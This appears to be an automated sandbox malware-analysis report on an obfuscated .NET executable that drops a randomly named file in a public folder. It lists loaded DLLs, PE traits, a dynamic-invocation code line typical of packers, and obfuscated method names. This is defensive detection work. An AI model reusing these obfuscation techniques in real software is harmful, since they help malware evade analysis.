Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: vb8DOBZQ4X.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: vb8DOBZQ4X.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: vb8DOBZQ4X.exe

Static file information: File size 3656704 > 1048576

Source: vb8DOBZQ4X.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x37c400

Source: vb8DOBZQ4X.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: *m.pdbh source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C404000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2207860586.000000001C1D0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BED5000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3024530595.000000001CBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: GSwhJpqdkmruXxiphyV.exe, 0000000E.00000002.2024282172.000000001C404000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000014.00000002.2207860586.000000001C1D0000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000020.00000002.2481680730.000000001BED5000.00000004.00000020.00020000.00000000.sdmp, GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3024530595.000000001CBB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e089\System.pdb source: GSwhJpqdkmruXxiphyV.exe, 00000039.00000002.3030299218.000000001CC95000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: vb8DOBZQ4X.exe, hBFn7RNFV7H302st7w2.cs

.Net Code: Type.GetTypeFromHandle(kaZotJYM6HDUjuh51Fh.NaNLpdn4LXV(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(kaZotJYM6HDUjuh51Fh.NaNLpdn4LXV(16777245)),Type.GetTypeFromHandle(kaZotJYM6HDUjuh51Fh.NaNLpdn4LXV(16777259))})

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9B8B57E9 push ds; ret	0_2_00007FFD9B8B57EC
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9B8B4C0C push es; retf	0_2_00007FFD9B8B4C0F
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BA1664B push ss; retf	0_2_00007FFD9BA1664C
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BA10BBC push E8FFFF86h; ret	0_2_00007FFD9BA10BC1
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BC71C35 push ds; iretd	0_2_00007FFD9BC71CCA
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BC71A94 push es; iretd	0_2_00007FFD9BC71AA2
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BC72134 push esi; iretd	0_2_00007FFD9BC7217A
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BC720FA push ebx; iretd	0_2_00007FFD9BC72132
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BC720B4 push eax; iretd	0_2_00007FFD9BC720F2
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9BC720B4 push ebx; iretd	0_2_00007FFD9BC72132
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9C023D2C push E8FFFFFFh; retf	0_2_00007FFD9C023D31
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9C02792B push ebx; retf	0_2_00007FFD9C02796A
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9C028167 push ebx; ret	0_2_00007FFD9C02816A
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9C027569 push ebx; iretd	0_2_00007FFD9C02756A
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Code function: 0_2_00007FFD9C02CE25 push eax; retf	0_2_00007FFD9C02CE26
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9B8757E9 push ds; ret	5_2_00007FFD9B8757EC
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9B874C0C push es; retf	5_2_00007FFD9B874C0F
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9B9D664B push ss; retf	5_2_00007FFD9B9D664C
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9B9D0BBC push E8FFFF86h; ret	5_2_00007FFD9B9D0BC1
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BC31C35 push ds; retf	5_2_00007FFD9BC31CCA
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BC31A94 push es; retf	5_2_00007FFD9BC31AA2
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BC32134 push esi; retf	5_2_00007FFD9BC3217A
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BC320FA push ebx; retf	5_2_00007FFD9BC32132
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BC320B4 push eax; retf	5_2_00007FFD9BC320F2
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BC320B4 push ebx; retf	5_2_00007FFD9BC32132
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BFE792C push ebx; retf	5_2_00007FFD9BFE796A
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BFE8167 push ebx; ret	5_2_00007FFD9BFE816A
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 5_2_00007FFD9BFECE25 push eax; retf	5_2_00007FFD9BFECE26
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 14_2_00007FFD9BAB4C0C push es; retf	14_2_00007FFD9BAB4C0F
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 14_2_00007FFD9BAB57E9 push ds; ret	14_2_00007FFD9BAB57EC
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Code function: 14_2_00007FFD9BC1664B push ss; retf	14_2_00007FFD9BC1664C

Source: vb8DOBZQ4X.exe, G7g4rYcq7wvYpTqnKgT.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'nsxPnvXaS9pVuLmiFGKS', 'PgwQZGXatjOeNiMTvnj7', 'DLmlUbXaEPjVBvRCrGFO'
Source: vb8DOBZQ4X.exe, XZVBtNsAPECyPZfQBWP.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'frsXlLjfYMb', 'xJCXsX6csbC', 'yfDRE6XinwHhyhZC23CV', 'OhwOYvXiQURG26fcNlAY', 'Dp1mhuXibIRYqnKIdPc5', 'DDyFuTXiUbEVekyJkbeP', 'upEJ2gXiWJFu9qxjho3p'
Source: vb8DOBZQ4X.exe, AHdf2PLolnaxmxXJbQ4.cs	High entropy of concatenated method names: 'Q9DLmslkrQ', 'SqKLF4fAdZ', 'O6ULVEA3C3', 'C9A78qXgnxKhlwaHE1tI', 'HRdoQ7XgQn2J8P1H3AVF', 'PhN5FLXgbFtqXNy7B5ac', 'r87D0vXgUDfpRI2Ava7M', 'fLv3PbXgWBEVQ5YodZaO'
Source: vb8DOBZQ4X.exe, eALbjJCqKGkjckui8JI.cs	High entropy of concatenated method names: 'rUWAV3X5sUtFON5l3NyT', 'Hx4UJHX5p61uDI3woMUW', 'oLE2agX5LidRhltWFura', 'Y97GeFX5j6NKlN57dqOf', 'PvsdVRXxwMx1RKknyrsf', 'jYxngeXxzgZ8O1sA7JIG', 'A26ipPX54BCIbTtekMV1', 'MGhfZfXxBURsNsJeChxu', 'ch7vDFXxYdmmihAnEbeY'
Source: vb8DOBZQ4X.exe, oDR4rpFSobgbMxPO9C.cs	High entropy of concatenated method names: 'ACK0vUREy', 'PCkyXAXKrbFemmyTrOV3', 'WiHuEGXKTm5ilEcCc6mc', 'FiIy74XKk58l0kggy2So', 'B0pNv6XKiPreWXY70Tdk', 'R6CAiAUA8', 'TPYnsUTtw', 'AgdQeBsjV', 'EeBbyH6Ke', 'iOFUOCgD9'
Source: vb8DOBZQ4X.exe, WsyLVUifnsRY60HqCqD.cs	High entropy of concatenated method names: 'GK6iu7fPeo', 'DhaidxkKFa', 'CAgi9YSEsA', 'nOCie6HlcQ', 'cJBiJgdy2i', 'HodJdgX9eP6P9pfkRSEb', 'wG4oLdX9Jx5cqtNE3Lf8', 't9WUIRX9drIHGKZrpLcV', 'lKFQPnX99lvIYZ5cyTYj', 'cMBC4nX9aaqGZdF0gACX'
Source: vb8DOBZQ4X.exe, K8sbWcKrqDsiWiAoXfr.cs	High entropy of concatenated method names: 'method_0', 'CXpKR23fEi', 'xNfK0XHwnu', 'ltsKqjSwIQ', 'RpJKcQD6so', 'JdlKPLqvaf', 'MtYKHlCqwD', 'dKwnymX8KHDAdm3xMqK1', 'GonPC7X8I2ydTbUkDimh', 'zk3K6HX8Oqiimn6nEfTA'
Source: vb8DOBZQ4X.exe, uwnjTCDWkJjmnimCDB4.cs	High entropy of concatenated method names: 'JbJ80XXPEqcHgQ3NIL0C', 'gjT5TrXPCHCTxmvahAAU', 'sbqdUJXPtRGHbObH12Zj', 'LDpOtYXPScgNQlcKk24e', 'fhPMwf6C6q', 'HcbqNSXPdRcCPMZXKiR7', 'JUJfXRXP8I1ddGySBybe', 'SMhcw3XPuwW7nklIo8LS', 'unmRuCXP96fitFaEsr8y', 'VtLivHXPeqR7Jgs9Hk8u'
Source: vb8DOBZQ4X.exe, QOPXLFlbufsLyTlt0Vv.cs	High entropy of concatenated method names: 'Iu6lWISkJr', 'DNYmorX0GNdBgySJgtwE', 'IcFvH8X0CZOpOW26gNPu', 'JA96USX0tbICqZ2MvaIk', 'KiY4OZX0EcIkoi25ZElh', 'MntWqMX0PNUMfNUuGukV', 'JmJbq2X0HlneZsQTEFbo', 'l9OxsEX0SwOlZ90d1XZd'
Source: vb8DOBZQ4X.exe, M8qGoJZt8I6gMUFJVt5.cs	High entropy of concatenated method names: 'eXiZ5BGU5Z', 'AKsZNDosbQ', 'pMkZBa9vYw', 'TWhgPrXRXYIOkk4IowOX', 'nx3mvyXTzFQpyIFsdwHq', 'IYEF1iXR4Ol3cQqeuDhB', 'SSxZSkwkw9', 'jgpZfp7Uw6', 'vxdZ8py41B', 'cLxZudTelj'
Source: vb8DOBZQ4X.exe, arXY0O0edQ4qqlEG9mj.cs	High entropy of concatenated method names: 'Gv4PyqXaoeDEEJbay9iF', 'zIUqrbXavIheT9RjSARo', 'o03NPmXaMoDlmncoriXg', 'KApkyrXaypNAZbATqhhs', 'OlR0anP1H2', 'Mh9', 'method_0', 'XC406oqBqw', 'Ch80xBe4YY', 'Pmv053gl9J'
Source: vb8DOBZQ4X.exe, Ecudu3pJcpoLZeqMc0x.cs	High entropy of concatenated method names: 'wyDpBlW1y6', 'XptpY2XRPp', 'Wempwidgdg', 'L2dpzmLtHZ', 'rnJZ4GluYR', 'cQaZXahcL1', 'yyBZLKaBSU', 'vKRaleXTv8NRNS9GonHI', 'LSDFAZXTMyuZAbFVahuN', 'zMoif2XT7XiIcERcn7e6'
Source: vb8DOBZQ4X.exe, rNlvovkC2NDD6WMak1W.cs	High entropy of concatenated method names: 'mXdkE4jFwq', 'Hr1kS9HrrD', 'ipNkfmFxux', 'x5uk8YeOP6', 'Xdbkuc9rke', 'v0IkdGaGA2', 'rfok94whLH', 'gQLkejqkHx', 'zlvkJHELcO', 'rhAkabRuCf'
Source: vb8DOBZQ4X.exe, vDSjarISnCE4dNIsOef.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'YDnI8kphV7', 'HkdIuxN64Z', 'Dispose', 'D31', 'wNK'
Source: vb8DOBZQ4X.exe, jRjuBTHfBh4Woevxm1L.cs	High entropy of concatenated method names: 'wlnXlIcX5m8', 'e1BHuP0gDC', 'BkBHdfV4kU', 'q1aH937TEG', 'aLYLyPX6t3Wk6RWNVeYv', 's7TlxRX6EZaBiylWyik4', 'dRYSGWX6SXb0GjGRtB7l', 'CCsHY9X6fA8fhfEjcPFv', 'BH3gIkX68b5sbVwS7ldR', 'DhDJkEX6uMt3nDaLA5IT'
Source: vb8DOBZQ4X.exe, pTijMe2rX3L1VnOfQq3.cs	High entropy of concatenated method names: 'hl42Rnk2fO', 'dSg20wPgS0', 'U1s7bJXRuHvbWP2xMgtQ', 'LIf2M1XRf8qCoJygQf68', 'Xj3NMsXR8QRvpYZtps7q', 'FgYUcGXRdQNnAnjw55pC', 'o1M1b5XR94K4uQ9sQDyC', 'rpvy5aXReCdAwHSq3jrO', 'cNt5sfXRJtkWRaJXlfnk', 'TlN1LiXRaERWeWTADGD7'
Source: vb8DOBZQ4X.exe, DuE8rrXVVqImOx4wgfN.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'SZFX2zxfXCQ', 'xJCXsX6csbC', 'Ojnr2uX1beLuAkxINWBM', 'Op9AIkX1UltJ08amyD6r'
Source: vb8DOBZQ4X.exe, f1h4ZiZ0JXZoTpV491a.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'LNsXl3lOLVI', 'xJCXsX6csbC', 'baUFXTXTGFPhj3hOPk6O', 'Qul2SKXTCfVSgMkfnJG7', 'JPT2J2XTtjhjwOJhfg82'
Source: vb8DOBZQ4X.exe, r282cC1jS6XmZRUkBPt.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'IDU1psu85E', 'Write', 'VQ41Zy9qpN', 'i5912TXrwE', 'Flush', 'vl7'
Source: vb8DOBZQ4X.exe, QLLMmfrlMBg9YWaWIZP.cs	High entropy of concatenated method names: 'Qp3r3xj7fi', 'ybur7nGCp2', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'PxGrhxUUwj', 'method_2', 'uc7'
Source: vb8DOBZQ4X.exe, kybNk25vQSQuedkvatO.cs	High entropy of concatenated method names: 'W7k5yUXLiQ', 'sH85A3A3xk', 'DD55baQbK9', 'tY85Uukh1R', 'O0i5WorACi', 'tNG5IpeCk9', 'fMM5OaPgB9', 'b5w5KYoJVU', 'Dispose', 'ipDKBwXBUkavjnDMLYl5'
Source: vb8DOBZQ4X.exe, eEnW7x0Pweh3YaShuEs.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'Af30G97TZ8', 'DMt0CC5Fnq', 'UuY0tSmLUd', 'H4F0E1NxAq', 'qJj0SrZQwC', 'bVf0fDfL4a', 'RP7rowXJBI8N9021Md69'
Source: vb8DOBZQ4X.exe, ab0WqcsOLnTaQkjCSob.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'D4qXljAEMQg', 'xJCXsX6csbC', 'XZUcYNXiK5netwrsQwkS', 'KQ1ukrXi1R30Y1QQtCYT', 'TYbIXFXigrBnIsJb7pgO'
Source: vb8DOBZQ4X.exe, kNZZyU2DhnB89i5jD6O.cs	High entropy of concatenated method names: 'Qjh27dtASF', 'lMq2hQgjll', 'pvl4faXRMlUVUGke0THe', 'YLar3cXRhGrWRJaSXVSP', 'dbxooWXRvGMngkQCyMnb', 'FwkQ0xXRorgUj6VrDi9d', 'F9R8T7XRywZ0aaRv9YmE', 'htMujNXRmSccPskCpl6l', 'PkaI6HXRFQV9kLQZ3q5d', 'kOjnAlXRVf15OUAPQqNV'
Source: vb8DOBZQ4X.exe, YmQglel31r909fDbaRE.cs	High entropy of concatenated method names: 'U1Ylh5WGaF', 'MphlvMoSbM', 'ttslM2XQXS', 'RyGaBEX0nMjVbtGvPL90', 'dCMHUpX0Qvu12O7tuyuF', 'AhoYuOX0VuYLpgjUDu8j', 'ansiduX0AUBxPcnnrEYI', 'RSoNKnX0bW7gNC1Q8fjN', 'BGU4H5X0Un3AZn0MaC8P', 'y4E2ciX0WJvN9spcqOxy'
Source: vb8DOBZQ4X.exe, sLMDIBHDdmAdGof14ji.cs	High entropy of concatenated method names: 'GBFHI2EtFj', 'uJK1DkX6kPGavpa9UCTX', 'FvpkN9X61HQlfWnYsFay', 'rtGAV1X6gDcMUtpKyU7r', 'hcDft3X6ip2ZkA8HKa2f', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: vb8DOBZQ4X.exe, dKFwM0GNtAxkfA8uhuF.cs	High entropy of concatenated method names: 'rkaGY61vAf', 'Cv6GwRmQik', 'ag3Gz5g5bS', 'djvC4m68IA', 'VvZCXS6F6a', 'qFCCL9jYjA', 'Xy4CjKReYI', 'EQBCsftnZv', 'LmOCpyewvM', 'IxTCZbWL1e'
Source: vb8DOBZQ4X.exe, rgqLIA6PFvv5oC6eDOQ.cs	High entropy of concatenated method names: 'YfHXlK2hQ3r', 'iFRXZOIT3e6', 'YFWD8tXNUloLRPh1mTGY', 'StCN25XNQKCiXkggMYU6', 'QobdddXNbGyrxW2L6UXB', 'wyJT6GXNKxopBMfQu5kl', 'u2vIpOXNItcWFsTmTWMu', 'T6ZcH8XNOE2RCgnBehOZ', 'ub4bJtXN1LeIFEyVa76v', 'imethod_0'
Source: vb8DOBZQ4X.exe, qAXxhjoUrbuJ81L7Hjs.cs	High entropy of concatenated method names: 'ydIAvdAu87', 'iM8AMkbg5n', 'rT1QvYXG9mZqD06IAFKm', 'zanx2NXGuYOmdFUF3qtT', 'OSKxE7XGdDtTEChKw5fb', 'E5TGZmXGeuZ6YwoX4CjR', 'Xelq7AXGJNyoNWdIFYAm', 't1eAAr25LX', 'OfJXJmXG5Eph8C5tupax', 'UxP5vrXG6Z1icFc0mlmv'
Source: vb8DOBZQ4X.exe, hpZi77DLYFGsjJr7Qly.cs	High entropy of concatenated method names: 'SJXDsgmUAA', 'dHUDpShy8X', 'ds3DZ2fl1y', 'GwaD2B5lQX', 'CigDlhW5Yu', 'ONADDqsXNK', 'ESPD3ZR2Y4', 'jYND74NPQG', 'bAUDhou10G', 'S4sDvTFKot'
Source: vb8DOBZQ4X.exe, rUDxX1LeZTOipv3IY1H.cs	High entropy of concatenated method names: 'tLTj2sixqE', 'O5OIlCXk4i8gkoqMwRB6', 'oXlEAoXkXjk6Z7Tn4XUn', 'zZO9ALXkLR8FpUhG0crH', 'pLpjmYXgwpMC5Gbpye2f', 'ClUXD8Xgz0aI84Yb17M1', 'qVcM5QXkjjTYCFxeJXLL', 'FQJgKsXks09q6Ec3mHOC', 'frPj4sE30g', 'yjAjLJF7tK'
Source: vb8DOBZQ4X.exe, Ybx0kYLrH0vw6BNIWc6.cs	High entropy of concatenated method names: 'jarLtsuASW', 'o9sLEvhieB', 'KW5IcsXgP6WlfUXAObRj', 'LNbKLqXgHtvT9KMcA2uQ', 'anAEy8XgGF58154PQCbS', 'NVGLuDxqqS', 'CSWKVnXgSmWikL7dfZvE', 'nIqX1KXgtIitERcsug9I', 'F7wqBPXgEUwd01BPZ48D', 'IiwpDmXgf3E9teDjCtup'
Source: vb8DOBZQ4X.exe, fd09Rv2XdkFrDePEAjJ.cs	High entropy of concatenated method names: 'hQU2jiv0Ao', 'RLX2ssFlxf', 'I9D2pe8Q58', 'H0yJrQXRpw6ETc8rrPg8', 'gRHKhTXRjdY4mKd0HXxX', 'KCFAlxXRsMThpEIHVfCL', 'fyvgeLXRZ3q4ZZThervB', 'hYUayqXR2dbW4uq76aUY', 'FgiJeeXRl89FWcEUjiwL', 'HhwMsGXRD7NU6TblS7fg'
Source: vb8DOBZQ4X.exe, frpGufz4b9TDgyl6Nl.cs	High entropy of concatenated method names: 'KakXXSdkfJ', 'gvHXjCfGhj', 'ww4XsIyret', 'prPXpAWRwg', 'IdpXZZDjYm', 'CYTX2GTnMt', 'B1iXDUNoxD', 'Ri8jhwX12r5kBx41tNUO', 'g1m1Z8X1lt9VZJr807pN', 'BqmdIkX1DP9SxAbIJGeT'
Source: vb8DOBZQ4X.exe, JTRVXd1tuKIgl1g5fyv.cs	High entropy of concatenated method names: 'hhR1YCBuQI', 'C2c1zWAftp', 'LgS1SaZRsK', 'sLs1flOvQB', 'x7o18j1deZ', 'cxm1uORoKX', 'yax1dE8IwQ', 'hqp194qRsm', 'FKw1eLRxsg', 'Fgh1JB7eGt'
Source: vb8DOBZQ4X.exe, wIFyr5RqgXct1NMnymP.cs	High entropy of concatenated method names: 'Close', 'qL6', 'OCURPiWiLa', 'sNSRHdE7xT', 'AorRGtqmDK', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: vb8DOBZQ4X.exe, huYWHSiwJ2Nxom0FYXS.cs	High entropy of concatenated method names: 'GgSr4FDJDA', 'DqprXysI60', 'Yd7', 'HKrrLAL4OL', 'mQYrjXNCQS', 'vsWrsoVWqO', 'gl1rpvvxhp', 'WuuC5cX9zks69AR5LRJ0', 'eW7yT7X9Y5pQCcJG3hUw', 'Jx1Ve2X9wp9NlvDE0cT8'
Source: vb8DOBZQ4X.exe, BS2SILYGT3R81pjoCEA.cs	High entropy of concatenated method names: 'dAwXZT8XkVj', 'tmvXZRfkWt2', 'Y7bXZ0bLrEr', 'MBsXZq5NIUG', 'tJ6XZccFPQK', 'rulXZPvCxyJ', 'tU5XZHvcGd3', 'mMrwpQIwhR', 'LPVXZGvhsCv', 'F44XZCOoFC1'
Source: vb8DOBZQ4X.exe, Qwf2XsZIsSdsxQtP5rV.cs	High entropy of concatenated method names: 'u8QZrXXi2u', 'iQBt1FXTqA6tKLGoGYbg', 'Q9O0KBXTceUmqPawCgq2', 'nQ9HhrXTPnvRkGDrpGrS', 'E94', 'P9X', 'vmethod_0', 'iByXsnumQOn', 'DJbXlDb9KVI', 'imethod_0'
Source: vb8DOBZQ4X.exe, CGG1f4DMtQPMN0l2tuC.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'zXvlLpXqP8QvTD4mVKV0', 'FkLuE6XqH12XpUederKW', 'cQXAprXqG2Sx35w2cteP', 'BANkYnXqC6Ofs1myK5gx'
